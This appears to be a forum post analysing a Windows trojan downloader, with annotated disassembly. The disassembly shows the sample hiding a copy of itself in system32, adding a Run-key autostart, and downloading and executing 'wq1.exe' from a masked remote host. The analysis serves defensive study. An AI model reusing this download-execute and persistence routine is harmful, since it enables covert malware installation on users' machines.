一、病毒标签:
病毒名称: Trojan-Downloader.Win32.Small.qg(卡巴)
病毒类型: 下载者
文件SHA1: d8a14e669243b960e749421d7ec8119cecc49258
危害等级: 3
文件长度: 脱壳前1,968 字节,脱壳后5,280 字节
受影响系统:Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
开发工具: Microsoft Visual C++ 6.0
加壳类型: FSG 1.33 -> dulek/xt
二、病毒描述:
复制自身到系统目录,修改注册表,执行指定地址下载。
三、行为分析:
1、打开自身文件并读取seg001:00401152 push eax ; lpFileName
seg001:00401153 call CreateFileA ; 打开自身文件
seg001:00401159 push 2 ; dwMoveMethod
seg001:0040115B push esi ; lpDistanceToMoveHigh
seg001:0040115C push 0FFFFFF60h ; lDistanceToMove
seg001:00401161 push eax ; hFile
seg001:00401162 mov [ebp+hObject], eax
seg001:00401165 call SetFilePointer
seg001:0040116B lea eax, [ebp+dwDisposition]
seg001:0040116E push esi ; lpOverlapped
seg001:0040116F mov ebx, 0A0h
seg001:00401174 push eax ; lpNumberOfBytesRead
seg001:00401175 mov edi, offset byte_401518
seg001:0040117A push ebx ; nNumberOfBytesToRead
seg001:0040117B push edi ; lpBuffer
seg001:0040117C push [ebp+hObject] ; hFile
seg001:0040117F call ReadFile ; 读文件
seg001:00401195 call GetVersion ; 检测系统版本
seg001:0040119B test eax, eax
seg001:0040119D jge short loc_4011C9
seg001:0040119F push offset LibFileName ; "kernel32.dll"
seg001:004011A4 call LoadLibraryA ; win9X下跳到这里注册服务
seg001:004011AA push offset ProcName ; "RegisterServiceProcess"
seg001:004011AF push eax ; hModule
seg001:004011B0 mov dword_4015C0, eax
seg001:004011B5 call GetProcAddress
seg001:004011BB cmp eax, esi
seg001:004011BD mov dword_4015BC, eax
seg001:004011D4 push eax ; lpBuffer
seg001:004011D5 call GetSystemDirectoryA ; 系统目录
seg001:004011DB mov edi, lstrcatA
seg001:004011E1 lea eax, [ebp+FileName]
seg001:004011E7 push offset String2 ; "\"
seg001:004011EC push eax ; lpString1
seg001:004011ED call edi ; lstrcatA
seg001:004011EF lea eax, [ebp+FileName]
seg001:004011F5 push offset byte_40159A ; lpString2
seg001:004011FA push eax ; lpString1
seg001:004011FB call edi ; lstrcatA ; C:\WINDOWS\system32\rundl1.exe
seg001:004011FD lea eax, [ebp+dwDisposition]
seg001:00401200 mov ebx, 80000002h
seg001:00401205 push eax ; lpdwDisposition
seg001:00401206 lea eax, [ebp+hKey]
seg001:00401209 push eax ; phkResult
seg001:0040120A push esi ; lpSecurityAttributes
seg001:0040120B push 0F003Fh ; samDesired
seg001:00401210 push esi ; dwOptions
seg001:00401211 push esi ; lpClass
seg001:00401212 push esi ; Reserved
seg001:00401213 push offset SubKey ; SOFTWARE\Microsoft\Windows\CurrentVersion\Run
seg001:00401218 push ebx ; hKey
seg001:00401219 call RegCreateKeyExA ; 创建注册表
seg001:0040121F lea eax, [ebp+FileName]
seg001:00401225 push eax ; lpString
seg001:00401226 call lstrlenA
seg001:0040122C push eax ; cbData
seg001:0040122D lea eax, [ebp+FileName]
seg001:00401233 push eax ; lpData
seg001:00401234 push 1 ; dwType
seg001:00401236 push esi ; Reserved
seg001:00401237 push offset ValueName ; lpValueName
seg001:0040123C push [ebp+hKey] ; hKey
seg001:0040123F call RegSetValueExA ; 设置键值RUN DLL,指向C:\WINDOWS\system32\rundl1.exe
seg001:00401245 push [ebp+hKey] ; hKey
seg001:00401248 call RegCloseKey
seg001:0040124E lea eax, [ebp+hKey]
seg001:00401251 push eax ; phkResult
seg001:00401252 push offset pszSubKey ; "Software\\wbd"
seg001:00401257 push ebx ; hKey
seg001:00401258 call RegOpenKeyA
seg001:0040125E push [ebp+hKey] ; hKey
seg001:00401261 mov [ebp+hObject], eax
seg001:00401264 call RegCloseKey
seg001:0040126A cmp [ebp+hObject], esi
seg001:0040126D jz loc_40134C
seg001:00401273 lea eax, [ebp+hKey]
seg001:00401276 mov dword ptr [ebp+Type], esi
seg001:00401279 push eax ; phkResult
seg001:0040127A push offset pszSubKey ; "Software\\wbd"
seg001:0040127F push ebx ; hKey
seg001:00401280 mov [ebp+cbData], 4
seg001:00401287 call RegCreateKeyA ; 创建注册表项Software\wbd
seg001:0040128D push [ebp+cbData] ; cbData
seg001:00401290 lea eax, [ebp+Type]
seg001:00401293 push eax ; lpData
seg001:00401294 push 4 ; dwType
seg001:00401296 push esi ; Reserved
seg001:00401297 push offset aHttpkb1 ; "httpkb1"
seg001:0040129C push [ebp+hKey] ; hKey
seg001:0040129F call RegSetValueExA ; 设置键值 httpkb1
seg001:004012A5 push [ebp+hKey] ; hKey
seg001:004012A8 call RegCloseKey
seg001:004012AE lea eax, [ebp+ExistingFileName]
seg001:004012B4 push 104h ; nSize
seg001:004012B9 push eax ; lpFilename
seg001:004012BA push esi ; hModule
seg001:004012BB call GetModuleFileNameA
seg001:004012C1 lea eax, [ebp+FileName]
seg001:004012C7 push 104h ; uSize
seg001:004012CC push eax ; lpBuffer
seg001:004012CD call GetSystemDirectoryA
seg001:004012D3 lea eax, [ebp+FileName]
seg001:004012D9 push offset String2 ; "\"
seg001:004012DE push eax ; lpString1
seg001:004012DF call edi ; lstrcatA
seg001:004012E1 lea eax, [ebp+FileName]
seg001:004012E7 push offset byte_40159A ; lpString2
seg001:004012EC push eax ; lpString1
seg001:004012ED call edi ; lstrcatA
seg001:004012EF lea eax, [ebp+FileName]
seg001:004012F5 push esi ; bFailIfExists
seg001:004012F6 push eax ; lpNewFileName
seg001:004012F7 lea eax, [ebp+ExistingFileName]
seg001:004012FD push eax ; lpExistingFileName
seg001:004012FE call CopyFileA ; 复制自身到系统目录下
seg001:00401304 lea eax, [ebp+FileName]
seg001:0040130A push 2 ; dwFileAttributes
seg001:0040130C push eax ; lpFileName
seg001:0040130D call SetFileAttributesA ; 设置隐藏属性
seg001:00401313 push 11h
seg001:00401315 xor eax, eax
seg001:00401317 pop ecx
seg001:00401318 lea edi, [ebp+StartupInfo]
seg001:0040131B rep stosd
seg001:0040131D lea eax, [ebp+ProcessInformation]
seg001:00401320 mov [ebp+StartupInfo.cb], 44h
seg001:00401327 push eax ; lpProcessInformation
seg001:00401328 lea eax, [ebp+StartupInfo]
seg001:0040132B push eax ; lpStartupInfo
seg001:0040132C push esi ; lpCurrentDirectory
seg001:0040132D push esi ; lpEnvironment
seg001:0040132E push 28h ; dwCreationFlags
seg001:00401330 push esi ; bInheritHandles
seg001:00401331 push esi ; lpThreadAttributes
seg001:00401332 push esi ; lpProcessAttributes
seg001:00401333 lea eax, [ebp+FileName]
seg001:00401339 push esi ; lpCommandLine
seg001:0040133A push eax ; lpApplicationName
seg001:0040133B mov [ebp+StartupInfo.wShowWindow], si
seg001:0040133F call CreateProcessA ; 创建进程
seg001:00401345 push esi ; uExitCode
seg001:00401346 call ExitProcess ; 退出
seg001:0040134C loc_40134C: ; CODE XREF: start+155 j
seg001:0040134C push offset Name ; "itiswbd"
seg001:00401351 push 1 ; bInitialOwner
seg001:00401353 push esi ; lpMutexAttributes
seg001:00401354 call CreateMutexA ; 创建互斥体itiswbd
seg001:0040135A call GetLastError
seg001:00401360 cmp eax, 0B7h
seg001:00401365 jnz short loc_40136E
seg001:00401367 push esi ; uExitCode
seg001:00401368 call ExitProcess
seg001:0040144D call InternetGetConnectedState ; 检测是否联网
seg001:00401453 test eax, eax
seg001:00401455 jz loc_401505 ; 不是就跳走
seg001:0040145B cmp dword_4015B8, esi
seg001:00401461 jz loc_4014F9
seg001:00401467 lea eax, [ebp+CmdLine]
seg001:0040146D push eax ; lpBuffer
seg001:0040146E push 104h ; nBufferLength
seg001:00401473 call GetTempPathA ; 临时路径
seg001:00401479 lea eax, [ebp+CmdLine]
seg001:0040147F push offset aWq1_exe ; "wq1.exe"
seg001:00401484 push eax ; lpString1
seg001:00401485 call lstrcatA
seg001:0040148B push esi ; LPBINDSTATUSCALLBACK
seg001:0040148C lea eax, [ebp+CmdLine]
seg001:00401492 push esi ; DWORD
seg001:00401493 push eax ; LPCSTR
seg001:00401494 push offset byte_401518 ; LPCSTR
seg001:00401499 push esi ; LPUNKNOWN
seg001:0040149A call URLDownloadToFileA ; http://www.XXXX.com/wq1.exe
seg001:0040149A ; 执行下载到临时路径目录
seg001:0040149F lea eax, [ebp+CmdLine]
seg001:004014A5 push esi ; uCmdShow
seg001:004014A6 push eax ; lpCmdLine
seg001:004014A7 mov [ebp+hKey], esi
seg001:004014AA call WinExec
seg001:004014B0 cmp eax, 1Fh
seg001:004014B3 mov dword ptr [ebp+Data], eax
seg001:004014B6 jbe short loc_4014F9
seg001:004014B8 lea eax, [ebp+hKey]
seg001:004014BB mov dword ptr [ebp+Data], 1
seg001:004014C2 push eax ; phkResult
seg001:004014C3 push offset pszSubKey ; "Software\\wbd"
seg001:004014C8 push 80000002h ; hKey
seg001:004014CD mov dword_4015B8, esi
seg001:004014D3 call RegCreateKeyA ; Software\wbd
seg001:004014D9 lea eax, [ebp+Data]
seg001:004014DC push 4 ; cbData
seg001:004014DE push eax ; lpData
seg001:004014DF push 4 ; dwType
seg001:004014E1 push esi ; Reserved
seg001:004014E2 push offset aHttpkb1 ; "httpkb1"
seg001:004014E7 push [ebp+hKey] ; hKey
seg001:004014EA call RegSetValueExA ; httpkb1
seg001:004014F0 push [ebp+hKey] ; hKey
seg001:004014F3 call RegCloseKey
| 
发表于 2009-2-11 17:52
发表于 2009-2-12 02:56
